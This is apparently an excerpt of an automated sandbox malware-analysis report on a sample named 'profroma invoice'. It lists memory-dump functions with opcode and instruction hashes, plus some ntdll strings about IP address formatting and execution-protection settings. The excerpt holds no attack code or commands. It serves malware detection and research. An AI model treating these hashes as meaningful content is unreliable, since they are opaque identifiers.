                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3236472c8b4cda0ef1416964d8572b0b46b0f52144d21812863e99dce35bc1a6
                                                          • Instruction ID: 0dc78222d005ba8d6fc12aa139e0184226f1e869cb76721644ed2cc9570cc3f5
                                                          • Opcode Fuzzy Hash: 3236472c8b4cda0ef1416964d8572b0b46b0f52144d21812863e99dce35bc1a6
                                                          • Instruction Fuzzy Hash: 57900225225500020645B558460850B4445A7D6351796C035F14165A0CC6218A655322
                                                          Function 01762AD0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: af822ff0ca7abf6a0152b99e903ad33737f7fd5e6caf58bab666df4e0a19412b
                                                          • Instruction ID: f3a278736c3d0b104c3b7b95493499654c0e79b644abde0cd659de498126eb95
                                                          • Opcode Fuzzy Hash: af822ff0ca7abf6a0152b99e903ad33737f7fd5e6caf58bab666df4e0a19412b
                                                          • Instruction Fuzzy Hash: 8F900225215500030605B5584708507404697D5351756C031F1015560CD6218A615222
                                                          Function 01762AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02b42350d818b09e9dfaa71b294d52bf73c199d6e88f07fc7d287112fc5971d2
                                                          • Instruction ID: 6f2e07dee98cd8bf884e6ddc7aa62b9783fa0cf27d1e58f7a2f2cbbd6e326979
                                                          • Opcode Fuzzy Hash: 02b42350d818b09e9dfaa71b294d52bf73c199d6e88f07fc7d287112fc5971d2
                                                          • Instruction Fuzzy Hash: 679002A1205640924A00B258C408B0A850597E0201F56C036E1054570CC5258A519236
                                                          Function 01762D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c2506ff7880a8f1d2f8de661288ebbb2f96d90664aef1efb2c0aae20b7a6697
                                                          • Instruction ID: 241eb77a3f01bea4e4816fc94d0724dfb22e7d2114b791f4472a6e1b9a9fe36d
                                                          • Opcode Fuzzy Hash: 9c2506ff7880a8f1d2f8de661288ebbb2f96d90664aef1efb2c0aae20b7a6697
                                                          • Instruction Fuzzy Hash: 8990022130550003D6407158941C6068005E7E1301F56D031E0414564CD9158A565323
                                                          Function 01762D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fc24eb850970b50978852d610c4c11e7cffcb17b6e315fe70d03ab141af8da8f
                                                          • Instruction ID: 961e57edceb6e5fb3b6fc91422f37daa204f0a112674188c222c09ddb10381dc
                                                          • Opcode Fuzzy Hash: fc24eb850970b50978852d610c4c11e7cffcb17b6e315fe70d03ab141af8da8f
                                                          • Instruction Fuzzy Hash: 5290022921750002D6807158940C60A400597D1202F96D435A0015568CC9158A695322
                                                          Function 01762D00 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 522c0de06f06755ce24be2b737c032705bd0b921c22a1db6078d7ca8a9141e57
                                                          • Instruction ID: d1b9f3c2becbd4ca080476e09a9f81f5a6713616d13964468c6d120985579784
                                                          • Opcode Fuzzy Hash: 522c0de06f06755ce24be2b737c032705bd0b921c22a1db6078d7ca8a9141e57
                                                          • Instruction Fuzzy Hash: 0290022120954442D6007558940CA06400597D0205F56D031A10645A5DC6358A51A232
                                                          Function 01762DD0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 18a6654cf013f53573050d6bb42c50a3d4df15356728c872ff80b6a972c94a08
                                                          • Instruction ID: 4858db9347b7c00d9a8e49871105bdeaa2f65f55dac96da7633f0ed2fd79339e
                                                          • Opcode Fuzzy Hash: 18a6654cf013f53573050d6bb42c50a3d4df15356728c872ff80b6a972c94a08
                                                          • Instruction Fuzzy Hash: 16900221246541525A45B15884085078006A7E0241B96C032A1414960CC5269A56D722
                                                          Function 01762DB0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 77e94404c320ebd92d427a9071804a67db414e48cb62fa6c28067db0e3474c73
                                                          • Instruction ID: 67e486a376a67d209709cf6e86177a22ac7af6c7ac83084a2ed1fe598b90c907
                                                          • Opcode Fuzzy Hash: 77e94404c320ebd92d427a9071804a67db414e48cb62fa6c28067db0e3474c73
                                                          • Instruction Fuzzy Hash: 5290023124550402D641715884086064009A7D0241F96C032A0424564EC6558B56AB62
                                                          Function 01762C60 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f9c346cb62465cd71d94d89f62f0ef0f234a28eceb3feec5b5837e1857f1a8a
                                                          • Instruction ID: 3ca6a72b81cc27c48992b0729550830b8596078c5e18eb089da1a43cab948ca8
                                                          • Opcode Fuzzy Hash: 2f9c346cb62465cd71d94d89f62f0ef0f234a28eceb3feec5b5837e1857f1a8a
                                                          • Instruction Fuzzy Hash: 4A90023120550842D60071588408B46400597E0301F56C036A0124664DC615CA517622
                                                          Function 01762CF0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 44763e0d592189c74f5a6b63d82e26cd2e0dc1380e772b304b60e67e5e663533
                                                          • Instruction ID: 2d8c70de2c4e6fd9f603f94b09dc5cc648541451a9338d66aa5e7007801324f7
                                                          • Opcode Fuzzy Hash: 44763e0d592189c74f5a6b63d82e26cd2e0dc1380e772b304b60e67e5e663533
                                                          • Instruction Fuzzy Hash: 7C90023120550403D6007158950C707400597D0201F56D431A0424568DD6568A516222
                                                          Function 01762CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dedcaabe47d61ddfd30d284cdb48eac2440b0660ef4d3e2f0277392e5843bd55
                                                          • Instruction ID: 88a58601332487e2cc11f22204d0e4de25c0b2b556fee5fef840dfd8f33e2298
                                                          • Opcode Fuzzy Hash: dedcaabe47d61ddfd30d284cdb48eac2440b0660ef4d3e2f0277392e5843bd55
                                                          • Instruction Fuzzy Hash: 8190022160950402D6407158941C706401597D0201F56D031A0024564DC6598B5567A2
                                                          Function 01762CA0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
                                                          • Instruction ID: edd33cef6e60a76d43f340a3144c32e8386aeb73aa9904fb71a9acbc983858a1
                                                          • Opcode Fuzzy Hash: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
                                                          • Instruction Fuzzy Hash: 4B90023120550402D6007598940C646400597E0301F56D031A5024565EC6658A916232
                                                          Function 01762F60 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cae4173f32a435f7b3af3198df85c4fd58d47b9187bcd2ad99b11b4bf016335b
                                                          • Instruction ID: 012a6eecdc388d8edb39fe489f768273fdac9bf558ef43055c4e1d0831f27bcc
                                                          • Opcode Fuzzy Hash: cae4173f32a435f7b3af3198df85c4fd58d47b9187bcd2ad99b11b4bf016335b
                                                          • Instruction Fuzzy Hash: 6F90026121550042D60471588408706404597E1201F56C032A2154564CC5298E615226
                                                          Function 01762F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
                                                          • Instruction ID: 9f22fc71efeff72b544323e8badad9e092b7e1bb31142e2b8b79f91c8a381334
                                                          • Opcode Fuzzy Hash: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
                                                          • Instruction Fuzzy Hash: 6290026134550442D60071588418B064005D7E1301F56C035E1064564DC619CE526227
                                                          Function 01762FE0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
                                                          • Instruction ID: 2780cf273c5fc94c4fe614b103c12c95c624f9d3e9eabe41bc76b0d4db20d2a0
                                                          • Opcode Fuzzy Hash: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
                                                          • Instruction Fuzzy Hash: 66900221215D0042D70075688C18B07400597D0303F56C135A0154564CC9158A615622
                                                          Function 01762FB0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
                                                          • Instruction ID: b3f1194d3bf4a1e2d2d04ebc4ca49bb1f1975e576d4decc26ca21a78ca90354e
                                                          • Opcode Fuzzy Hash: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
                                                          • Instruction Fuzzy Hash: 949002216055004246407168C8489068005BBE1211B56C131A0998560DC5598A655766
                                                          Function 01762FA0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
                                                          • Instruction ID: ff4b3cca795d54c19a22a690eee36f76a5c662edfb669b98fc8b8a2b911d6e87
                                                          • Opcode Fuzzy Hash: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
                                                          • Instruction Fuzzy Hash: C590023120590402D6007158880C747400597D0302F56C031A5164565EC665CA916632
                                                          Function 01762F90 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                                          • Instruction ID: ab7329b6292be6b87681da3e7e720df5087802b5c3885cf251b62602723777ae
                                                          • Opcode Fuzzy Hash: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                                          • Instruction Fuzzy Hash: E190023120590402D6007158881870B400597D0302F56C031A1164565DC6258A516672
                                                          Function 01762E30 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
                                                          • Instruction ID: d353c2043eebf6997b8417e0390370371823f9ad361d6e811f05e4b82a04cdb3
                                                          • Opcode Fuzzy Hash: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
                                                          • Instruction Fuzzy Hash: 5790022130550402D602715884186064009D7D1345F96C032E1424565DC6258B53A233
                                                          Function 01762EE0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
                                                          • Instruction ID: 82bd6962fb32a8bd1692ac26adcd46e509f36fbdec0e8e87e570926f84119f01
                                                          • Opcode Fuzzy Hash: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
                                                          • Instruction Fuzzy Hash: FC90026120590403D64075588808607400597D0302F56C031A2064565ECA298E516236
                                                          Function 01762EA0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                          • Instruction ID: 4f6c544e1c9f4bc262954f19114bef7eff21486d5d7452fdcdf01c255ff79276
                                                          • Opcode Fuzzy Hash: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                          • Instruction Fuzzy Hash: FC90027120550402D64071588408746400597D0301F56C031A5064564EC6598FD56766
                                                          Function 01762E80 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                          • Instruction ID: 5cec2eb2de273af7ef5c1b27adcc5ecc8f5f9795cd3ef70429dc22916a63c392
                                                          • Opcode Fuzzy Hash: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                          • Instruction Fuzzy Hash: 3690022160550502D60171588408616400A97D0241F96C032A1024565ECA258B92A232
                                                          Function 01763010 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
                                                          • Instruction ID: a2341868aa12a411e605991a7913e10ae2fdffaa38001835c632a06c617d53aa
                                                          • Opcode Fuzzy Hash: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
                                                          • Instruction Fuzzy Hash: 3890022120594442D64072588808B0F810597E1202F96C039A4156564CC9158A555722
                                                          Function 01763090 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
                                                          • Instruction ID: e96d7e270f179ab55a5510a91dfb645ae5ba3811d41f26684d2cda3b24fa81e0
                                                          • Opcode Fuzzy Hash: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
                                                          • Instruction Fuzzy Hash: F890022124550802D6407158C4187074006D7D0601F56C031A0024564DC6168B6567B2
                                                          Function 017639B0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
                                                          • Instruction ID: ea9e702fbc1a256cb2d72fdf1556f28a4baa4ea54ee583244b53cd6d087a9242
                                                          • Opcode Fuzzy Hash: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
                                                          • Instruction Fuzzy Hash: 1F90022124955102D650715C84086168005B7E0201F56C031A08145A4DC5558A556322
                                                          Function 01763D70 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
                                                          • Instruction ID: dd89340cb0f5596f32c6f382878338044ba0ede3612c73785ff05b0b4c4ac8d3
                                                          • Opcode Fuzzy Hash: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
                                                          • Instruction Fuzzy Hash: 8390023520550402DA1071589808646404697D0301F56D431A0424568DC6548AA1A222
                                                          Function 01763D10 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
                                                          • Instruction ID: 1359757081b8d6f89ee8978b24859fff7a0f614623e52348569b2cc399182689
                                                          • Opcode Fuzzy Hash: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
                                                          • Instruction Fuzzy Hash: 51900231206501429A4072589808A4E810597E1302F96D435A0015564CC9148A615322
                                                          Function 01762C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: a6829e4c67f372c4345bb54c3a2bcf42fca153cb3710fa567e667a5536103ef7
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          Function 01762890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                          • Instruction ID: b1c81f082015e3e1ff10aa9068d89fecfdd11b82b8a53be36107d0e4522771e2
                                                          • Opcode Fuzzy Hash: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                          • Instruction Fuzzy Hash: 7F51D5B1B00216AFDF51DB9C8C9097EFBBCBB48240B14C169E965D7646D734DE04CBA0
                                                          Function 017D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                          • Instruction ID: 2484f09295321102679f4ece7783770374025f08f51f0e7e7bec6b488a5b1c37
                                                          • Opcode Fuzzy Hash: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                          • Instruction Fuzzy Hash: D451F6B1A0064AAECB31DF5CC99097FFBF8EB44200B648899E997D7646E674DE018760
                                                          Function 01757630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • ExecuteOptions, xrefs: 017946A0
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01794655
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01794725
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017946FC
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01794742
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01794787
                                                          • Execute=1, xrefs: 01794713
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                          • Instruction ID: c36553e278c428ac8b2bdb3c7bf9d8ce048224f4f87d58cf864866e6b4ab8ef9
                                                          • Opcode Fuzzy Hash: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                          • Instruction Fuzzy Hash: 75511B71600219AAEF15AAA8EC99FADF7ACEF14304F8400D9EA05A71C1D7B0DA45CF61
                                                          Function 017F6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
